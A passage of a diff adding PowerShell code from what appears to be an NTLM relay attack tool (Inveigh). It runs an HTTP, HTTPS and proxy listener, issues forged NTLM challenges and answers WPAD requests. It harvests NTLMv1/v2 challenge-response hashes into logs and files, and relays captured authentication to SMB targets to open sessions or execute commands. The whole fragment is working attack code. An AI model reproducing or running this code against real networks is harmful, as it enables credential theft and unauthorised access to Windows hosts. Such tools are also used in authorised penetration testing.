+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay failed on $Target") > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ }
+
+ if(!$SMB_relay_failed -and $RelayAutoDisable -eq 'Y' -and $inveigh.target_list.Count -eq 1 -and $Attack -ne 'Session')
+ {
+ $inveigh.target_list.Remove($Target)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay auto disabled due to success") > $null
+ $inveigh.SMB_relay = $false
+ }
+ elseif(!$SMB_relay_failed -and $Attack -ne 'Session')
+ {
+ $inveigh.target_list.Remove($Target)
+ }
+
+ if($Attack -eq 'Session')
+ {
+ return $SMB_administrator
+ }
+ else
+ {
+ $SMB_relay_socket.Close()
+ }
+
+ }
+
+}
+
+# HTTP/HTTPS/Proxy Server ScriptBlock
+$HTTP_scriptblock =
+{
+ param ($Attack,$Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPS_listener,
+ $Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$SessionLimit,$SessionPriority,
+ $Target,$Username,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
+
+ function NTLMChallengeBase64
+ {
+ param ([String]$Challenge,[String]$ClientIPAddress,[Int]$ClientPort)
+
+ $HTTP_timestamp = Get-Date
+ $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
+ $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
+ $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ if($Challenge)
+ {
+ $HTTP_challenge = $Challenge
+ $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
+ $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $HTTP_challenge_bytes = [String](1..8 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $HTTP_challenge = $HTTP_challenge_bytes -replace ' ',''
+ $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+
+ $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
+
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
+ 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
+ $HTTP_challenge_bytes +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
+ 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
+ 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
+ 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
+ 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
+ 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
+ 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
+ 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
+ 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+ $HTTP_timestamp +
+ 0x00,0x00,0x00,0x00,0x0a,0x0a
+
+ $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+ $NTLM = 'NTLM ' + $NTLM_challenge_base64
+ $NTLM_challenge = $HTTP_challenge
+
+ return $NTLM
+ }
+
+ if($HTTPS_listener)
+ {
+ $HTTP_type = "HTTPS"
+ }
+ elseif($proxy_listener)
+ {
+ $HTTP_type = "Proxy"
+ }
+ else
+ {
+ $HTTP_type = "HTTP"
+ }
+
+ if($HTTPIP -ne '0.0.0.0')
+ {
+ $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP)
+ $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort)
+ }
+ else
+ {
+ $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
+ }
+
+ $HTTP_running = $true
+ $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
+ $HTTP_client_close = $true
+ $relay_step = 0
+
+ if($proxy_listener)
+ {
+ $HTTP_linger = New-Object System.Net.Sockets.LingerOption($true,0)
+ $HTTP_listener.Server.LingerState = $HTTP_linger
+ }
+
+ try
+ {
+ $HTTP_listener.Start()
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener")
+ $HTTP_running = $false
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener")
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener")
+ }
+
+ }
+
+ :HTTP_listener_loop while($inveigh.relay_running -and $HTTP_running)
+ {
+ $TCP_request = ""
+ $TCP_request_bytes = New-Object System.Byte[] 4096
+ $HTTP_send = $true
+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html")
+ $HTTP_header_cache_control = ""
+ $HTTP_header_authenticate = ""
+ $HTTP_header_authenticate_data = ""
+ $HTTP_message = ""
+ $HTTP_header_authorization = ""
+ $HTTP_header_host = ""
+ $HTTP_header_user_agent = ""
+ $HTTP_request_raw_URL = ""
+ $NTLM = "NTLM"
+
+ while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
+ {
+ Start-Sleep -m 10
+
+ if(!$inveigh.relay_running)
+ {
+ break HTTP_listener_loop
+ }
+
+ }
+
+ if($relay_step -gt 0)
+ {
+ $relay_reset++
+
+ if($relay_reset -gt 2)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay attack resetting") > $null
+ $SMB_relay_socket.Close()
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $relay_reset = 0
+ }
+
+ if($HTTPS_listener)
+ {
+
+ if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
+ {
+ $HTTP_client = $HTTP_listener.AcceptTcpClient()
+ $HTTP_clear_stream = $HTTP_client.GetStream()
+ $HTTP_stream = New-Object System.Net.Security.SslStream($HTTP_clear_stream,$false)
+ $SSL_cert = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -match $inveigh.certificate_CN})
+ $HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false)
+ }
+
+ [byte[]]$SSL_request_bytes = $null
+
+ do
+ {
+ $HTTP_request_byte_count = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
+ $SSL_request_bytes += $TCP_request_bytes[0..($HTTP_request_byte_count - 1)]
+ } while ($HTTP_clear_stream.DataAvailable)
+
+ $TCP_request = [System.BitConverter]::ToString($SSL_request_bytes)
+ }
+ else
+ {
+
+ if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
+ {
+ $HTTP_client = $HTTP_listener.AcceptTcpClient()
+ $HTTP_stream = $HTTP_client.GetStream()
+ }
+
+ if($HTTP_stream.DataAvailable)
+ {
+ $HTTP_data_available = $true
+ }
+ else
+ {
+ $HTTP_data_available = $false
+ }
+
+ while($HTTP_stream.DataAvailable)
+ {
+ $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
+ }
+
+ $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
+ }
+
+ if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*" -or $TCP_request -like "43-4f-4e-4e-45-43-54*")
+ {
+ $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
+ $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
+ $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
+
+ if($TCP_request -like "*-48-6F-73-74-3A-20-*")
+ {
+ $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19)
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
+ }
+
+ if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
+ {
+ $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37)
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
+ }
+
+ if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
+
+ if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
+ }
+
+ }
+
+ if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
+ {
+ $HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
+ $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Substring(0,$HTTP_header_authorization_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length)
+ }
+
+ if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or (
+ $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
+ {
+ $HTTP_response_status_code = 0x32,0x30,0x30
+ $HTTP_response_phrase = 0x4f,0x4b
+ $HTTP_client_close = $true
+ }
+ else
+ {
+
+ if($proxy_listener)
+ {
+ $HTTP_response_status_code = 0x34,0x30,0x37
+ $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
+ }
+ else
+ {
+ $HTTP_response_status_code = 0x34,0x30,0x31
+ $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
+
+ if($HTTP_request_raw_URL -match '/wpad.dat')
+ {
+ $HTTP_reset_delay = $true
+ $HTTP_reset_delay_timeout = New-TimeSpan -Seconds $HTTPResetDelayTimeout
+ $HTTP_reset_delay_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
+ }
+
+ $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
+ $HTTP_client_close = $false
+ }
+
+ if($HTTP_header_authorization.StartsWith('NTLM '))
+ {
+ $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
+ [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
+
+ if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
+ {
+
+ if($attack -eq 'Session')
+ {
+ $target = $null
+
+ ForEach($target_entry in $inveigh.target_list)
+ {
+
+ if(!$target)
+ {
+
+ if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Initiator -eq $HTTP_source_IP -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+ {
+ $target = $target_entry
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+ }
+
+ }
+
+ }
+
+ if(!$target -and $SessionPriority -eq 'Y')
+ {
+
+ ForEach($target_entry in $inveigh.target_list)
+ {
+
+ if(!$target)
+ {
+
+ if($HTTP_source_IP -ne $target_entry -and ($inveigh.session_list | Where-Object {$_.Privileged -eq 'yes' -and $_.Target -eq $target_entry -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+ {
+ $target = $target_entry
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+ else
+ {
+ $target = $null
+
+ ForEach($target_entry in $inveigh.target_list)
+ {
+
+ if(!$target)
+ {
+
+ if($HTTP_source_IP -ne $target_entry -and !$inveigh.relay_list.Contains("$HTTP_source_IP $target_entry"))
+ {
+ $target = $target_entry
+ }
+
+ }
+
+ }
+
+ if(!$target)
+ {
+ $target = $inveigh.target_list[(Get-Random -Maximum $inveigh.target_list.Count)]
+ }
+
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Selected $target as relay target")
+ }
+
+ if($inveigh.SMB_relay -and $relay_step -eq 0 -and ($target -and $HTTP_source_IP -ne $target))
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay initiated by $HTTP_source_IP")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Grabbing challenge for relay from $target")
+ $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
+ $SMB_relay_socket.Client.ReceiveTimeout = 60000
+ $SMB_relay_socket.Connect($Target,"445")
+ $HTTP_client_close = $false
+ $relay_step = 1
+
+ if(!$SMB_relay_socket.connected)
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding")
+ $relay_step = 0
+ }
+
+ if($relay_step -eq 1)
+ {
+ $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version
+
+ if($SMB_relay_bytes.Length -le 3)
+ {
+ $relay_step = 0
+ $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
+ }
+
+ }
+
+ if($relay_step -eq 1)
+ {
+ $SMB_user_ID = $SMB_relay_bytes[34..33]
+ $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
+ $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
+ $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
+ $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
+ $SMB_domain_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
+ $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
+ $SMB_target_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
+ $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
+ $SMB_relay_target_flag = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 22)]
+ $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
+ $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
+ $SMB_session_ID = $SMB_relay_bytes[44..51]
+
+ if([System.BitConverter]::ToString($SMB_relay_bytes[4..7]) -eq 'ff-53-4d-42')
+ {
+ $SMB_version -eq 'SMB1'
+ }
+
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+ $SMB_domain_length_offset_bytes +
+ 0x05,0x82 +
+ $SMB_relay_target_flag +
+ 0xa2 +
+ $SMB_relay_NTLM_challenge +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $SMB_target_length_offset_bytes +
+ $SMB_relay_target_details
+
+ $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+ $NTLM = 'NTLM ' + $NTLM_challenge_base64
+ $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
+ $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Received challenge $NTLM_challenge for relay from $Target")
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
+ $relay_step = 2
+ }
+ else
+ {
+ $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
+ }
+
+ }
+ else
+ {
+
+ if(!$target)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted due to lack of an eligible target")
+ }
+ elseif($HTTP_source_IP -ne $Target)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted relay due to initiator matching $target")
+ }
+
+ $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
+ {
+ $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
+ $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
+ $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
+ $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
+ [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
+ $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
+ $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
+
+ if($HTTP_NTLM_domain_length -eq 0)
+ {
+ $HTTP_NTLM_domain_string = ''
+ }
+ else
+ {
+ $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
+ }
+
+ $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
+ $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
+
+ if($HTTP_NTLM_user_length -gt 0)
+ {
+ $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+ }
+ else
+ {
+ $HTTP_NTLM_user_string = ""
+ }
+
+ $HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string
+ $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
+ $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
+ $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+
+ if($HTTP_NTLM_length -eq 24) # NTLMv1
+ {
+ $NTLM_type = "NTLMv1"
+ $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+ $NTLM_response = $NTLM_response.Insert(48,':')
+ $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
+
+ if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+ {
+ $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
+
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique")
+ }
+
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
+ {
+ $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file)
+ }
+
+ if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
+ {
+ $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_username_full")
+ }
+
+ }
+
+ }
+ else # NTLMv2
+ {
+ $NTLM_type = "NTLMv2"
+ $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+ $NTLM_response = $NTLM_response.Insert(32,':')
+ $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
+
+ if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+ {
+ $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
+
+ if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_username_full - not unique")
+ }
+
+ if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")))
+ {
+ $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+ }
+
+ if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")
+ {
+ $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full")
+ }
+
+ }
+
+ }
+
+ $HTTP_response_status_code = 0x32,0x30,0x30
+ $HTTP_response_phrase = 0x4f,0x4b
+ $HTTP_client_close = $true
+ $NTLM_challenge = ""
+
+ if($inveigh.SMB_relay -and $relay_step -eq 2)
+ {
+
+ if(!$Username -or $Username -contains $HTTP_NTLM_user_string -or $Username -contains "$HTTP_username_full")
+ {
+
+ if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
+ {
+
+ if($inveigh.relay_user_failed_list -notcontains "$HTTP_source_IP $HTTP_username_full $Target")
+ {
+
+ if(($inveigh.session_list | Where-Object {$_.User -eq $HTTP_username_full -and $_.Target -eq $target -and $_.Status -eq 'connected'} | Measure-Object).Count -lt $SessionLimit)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target")
+ $SMB_relay_failed = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID
+
+ if(!$SMB_relay_failed)
+ {
+
+ if($Attack -eq 'Session')
+ {
+ $inveigh.session_socket_table[$inveigh.session_count] = $SMB_relay_socket
+ $inveigh.session_table[$inveigh.session_count] = $SMB_session_ID
+ $inveigh.session_message_ID_table[$inveigh.session_count] = 3
+ $inveigh.session_lock_table[$inveigh.session_count] = 'open'
+ $session_privilege = SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID
+ $session_object = New-Object PSObject
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Initiator $HTTP_source_IP
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $HTTP_username_full
+
+ if($session_privilege)
+ {
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "yes"
+ }
+ else
+ {
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "no"
+ }
+
+ if($SMB_relay_socket.Connected)
+ {
+ $status = "connected"
+ }
+ else
+ {
+ $status = "disconnected"
+ }
+
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s)
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s)
+ $inveigh.session_list += $session_object
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sesion $($inveigh.session_count) added to session list")
+ $inveigh.session_count++
+ }
+ else
+ {
+ SMBRelayExecute $SMB_relay_socket $SMB_version $SMB_user_ID $SMB_session_ID
+ }
+
+ }
+
+ $relay_step = 0
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has reached session limit on $Target")
+ $SMB_relay_socket.Close()
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target")
+ $SMB_relay_socket.Close()
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
+ $SMB_relay_socket.Close()
+ $relay_step = 0
+ }
+
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full not on relay username list")
+ $SMB_relay_socket.Close()
+ $relay_step = 0
+ }
+
+ }
+
+ if($proxy_listener)
+ {
+ $HTTP_send = $false
+ }
+
+ }
+ else
+ {
+ $HTTP_client_close = $false
+ }
+
+ }
+
+ if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
+ {
+ $HTTP_message = $WPADResponse
